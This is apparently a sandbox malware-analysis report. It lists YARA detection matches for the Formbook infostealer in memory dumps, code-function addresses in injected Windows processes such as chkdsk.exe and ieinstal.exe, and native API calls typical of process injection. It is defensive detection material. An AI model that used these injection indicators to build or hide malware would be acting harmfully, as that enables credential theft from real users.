      Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04F19000
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04F1E7EF
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04F18FF2
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04F18FA8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_04F1E820
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0835E830
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_08356A50
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_08356A50
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_08355430
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0836EC40
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_08367358
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC2EE8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD1EB2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F08FF63
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFF0E50
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F08EFBF
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F081FC6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD6FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F012E48
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F070E6D
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F080EAD
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F089ED2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFDCF00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEFCE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFE8CDF
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F08FD27
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F087D4C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD3C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC0C12
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F06FDF4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F04EC20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD9DD0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F07EC4C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFE2DB0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F086C69
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F08EC60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD0D69
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F069C98
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F09ACEB
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F057CE8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFCAD00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F00DB19
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F08FB2E
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEFAA0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F044BC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F08CA13
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F08EA5B
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F08FA89
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD0B10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD28C0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFE6882
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD9870
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEB870
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFB6868
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F08E9A6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F0159C0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFFE810
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD3800
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F070835
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFCE9A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F045870
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F08F872
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F0498B2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F0818DA
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F0878F3
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFCC6E0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F086757
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD0680
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFF4670
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEC600
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F06D62C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F07D646
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD2760
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFDA760
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F08A6C0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F0436EC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F08F6F6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F09A526
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD0445
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F08F5C9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F0875C6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F03D480
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBD2EC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F08F330
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F08124C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC1380
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFDE310
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F09010E
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFDB0D0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F06D130
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFC00A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFEB1E0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFD51C0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F07E076
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F00508C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1EFBF113
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F0870F1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050BA526
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FF0445
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050AF5C9
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050A75C6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0505D480
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FEC6E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050A6757
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FF0680
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0500C600
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0508D62C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0509D646
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05014670
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FF2760
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FFA760
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050AA6C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050636EC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050AF6F6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050B010E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FFB0D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0508D130
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FE00A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0500B1E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FF51C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0509E076
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0502508C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FDF113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050A70F1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FDD2EC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050AF330
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050A124C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FE1380
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FFE310
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050AFD27
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050A7D4C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FF3C60
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05002DB0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FE0C12
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0508FDF4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FF9DD0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0509EC4C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050A6C69
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050AEC60
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05089C98
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FF0D69
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05008CDF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0500FCE0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050BACEB
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FEAD00
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FE2EE8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FF1EB2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050AFF63
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050AEFBF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050A1FC6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FF6FE0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05032E48
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05010E50
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05090E6D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050A0EAD
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050A9ED2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FFCF00
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FF28C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FF9870
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FD6868
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050AE9A6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050359C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FF3800
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0501E810
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05090835
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FEE9A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0500B870
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050AF872
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05006882
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050698B2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050A18DA
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050A78F3
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0502DB19
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050AFB2E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05064BC0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050ACA13
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050AEA5B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050AFA89
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0500FAA0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_04FF0B10
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0071E7C6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_00702D90
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_00702D87
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_00709E50
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_00709E4F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_00702FB0
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 37_2_00000265BE730232
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 37_2_00000265BE72F036
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 37_2_00000265BE7335CD
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 37_2_00000265BE726082
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 37_2_00000265BE72AB30
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 37_2_00000265BE72AB32
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 37_2_00000265BE72D912
      Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 37_2_00000265BE727D02
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 04FDB910 appears 268 times
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 05025050 appears 36 times
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0506EF10 appears 105 times
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 05037BE4 appears 89 times
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0505E692 appears 79 times
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 1F03E692 appears 82 times
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 1F04EF10 appears 105 times
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 1F005050 appears 36 times
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 1EFBB910 appears 268 times
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 1F017BE4 appears 96 times
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002F00 NtCreateFile,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002E50 NtCreateSection,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002EB0 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002ED0 NtResumeThread,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002D10 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002DA0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002C30 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002C50 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002CF0 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002B10 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002B90 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002BC0 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002A80 NtClose,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F0029F0 NtReadFile,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002F30 NtOpenDirectoryObject,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002FB0 NtSetValueKey,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002E00 NtQueueApcThread,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002E80 NtCreateProcessEx,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002EC0 NtQuerySection,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002D50 NtWriteVirtualMemory,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002C10 NtOpenProcess,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002C20 NtSetInformationFile,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F003C30 NtOpenProcessToken,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F003C90 NtOpenThread,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002CD0 NtEnumerateKey,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002B00 NtQueryValueKey,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002B20 NtQueryInformationProcess,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002B80 NtCreateKey,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002BE0 NtQueryVirtualMemory,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002A10 NtWriteFile,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002AA0 NtQueryInformationFile,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F002AC0 NtEnumerateValueKey,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F0029D0 NtWaitForSingleObject,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F0038D0 NtGetContextThread,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F004570 NtSuspendThread,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F0034E0 NtCreateMutant,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 27_2_1F004260 NtSetContextThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050234E0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022D10 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022C20 NtSetInformationFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022C30 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022CF0 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022F00 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022FB0 NtSetValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022E50 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050229F0 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022B00 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022B10 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022B80 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022B90 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022BC0 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022A10 NtWriteFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022A80 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022AC0 NtEnumerateValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05024570 NtSuspendThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05024260 NtSetContextThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022D50 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022DA0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022C10 NtOpenProcess,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05023C30 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022C50 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05023C90 NtOpenThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022CD0 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022F30 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022E00 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022E80 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022EB0 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022EC0 NtQuerySection,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022ED0 NtResumeThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050229D0 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_050238D0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022B20 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022BE0 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_05022AA0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0071A350 NtCreateFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0071A400 NtReadFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0071A480 NtClose,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 32_2_0071A530 NtAllocateVirtualMemory,
